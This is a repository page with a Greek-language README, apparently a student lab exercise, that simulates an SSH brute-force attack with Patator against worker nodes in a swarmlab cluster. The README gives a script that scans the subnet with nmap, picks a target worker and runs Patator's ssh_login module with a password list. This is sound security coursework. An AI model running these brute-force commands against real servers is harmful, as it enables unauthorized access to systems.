AndreasNefeli
91e7729805
|
4 years ago | |
---|---|---|
.. | ||
README.md | 4 years ago | |
master.sh | 4 years ago | |
passwords.txt | 4 years ago |
README.md
SSH Brute Force
Για την προσομοίωση της επίθεσης SSH Brute Force, επιλέξαμε να χρησιμοποιήσουμε το Patator.
Το Patator είναι ένα εργαλείο, γραμμένο σε python, για Brute Force επιθέσεις, με εξαιρετικά μεγάλο πλήθος modules και πολλές ευέλικτες ρυθμίσεις.
Εγκατάσταση του Patator
Όπως και σε όλα τα ερωτήματα της εργασίας, κάθε υλοποίηση γίνεται σε ξεχωριστό φάκελο. Επομένως, η εγκατάσταση θα γίνει εντός του SSH Brute Force directory. Ως kali users, έχουμε ήδη στη διάθεσή μας το συγκεκριμένο εργαλείο. Σε κάθε άλλη περίπτωση ακολουθούμε μόνο την πρώτη φορα χρήσης του τα εξής βήματα:
- sudo apt update
- sudo apt upgrade -y
- sudo apt install patator -y
- git clone https://github.com/lanjelot/patator.git
Αφού ολοκλρωθεί η εγκατάσταση, συνδεόμαστε στον master, από τον οποίο θα υλοποιηθεί και η επίθεση.
sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login
Σημείωση: Προκειμένου να μάθουμε ποια εντολή πρέπει να χρησιμοποιήσουμε για τη συγκεκριμένη επίθεση, ανατρέξαμε στο documentation της patator, μέσω των εντολών:
- python patator.py
- python patator.py ssh_login (καθώς αυτή είναι η επίθεση που μας ενδιαφέρει.)
Το αποτέλεσμα της αναζήτησής μας, είναι η σωστή σύνταξη της εντολής για την εκτέλεση της επίθεσης. Στην προκειμένη περίπτωση, η εντολής είναι της μορφής **ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.' **
Έπειτα, δημιουργήσαμε και τρέξαμε ένα script master.sh, το οποίο περιέχει όλες τις εντολές για την υλοποιήση της επίθεσης. ./master.sh
Το master.sh περιέχει τις εξής εντoλές:
-
H my_ip περιέχει την ip διεύθυνση του master.
my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')
*H network περιέχει την ip του δικτύου, την οποία χρησιμοποιούμε για να βρούμε την ip του worker, στον οποίο θα επιτεθούμε.
network=$(echo $my_ip | sed 's/.[0-9]$/.*/')
-
Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο grep worker_ψηφίο.
worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')
-
Με την ακόλουθη εντολή εκτελείτε η επίθεση.
patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker #emfanizei kai tis apotyximenes prospatheies #patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.' #emfanizei mono tin epithesi ston kwdiko pou isxuei
REFERENCES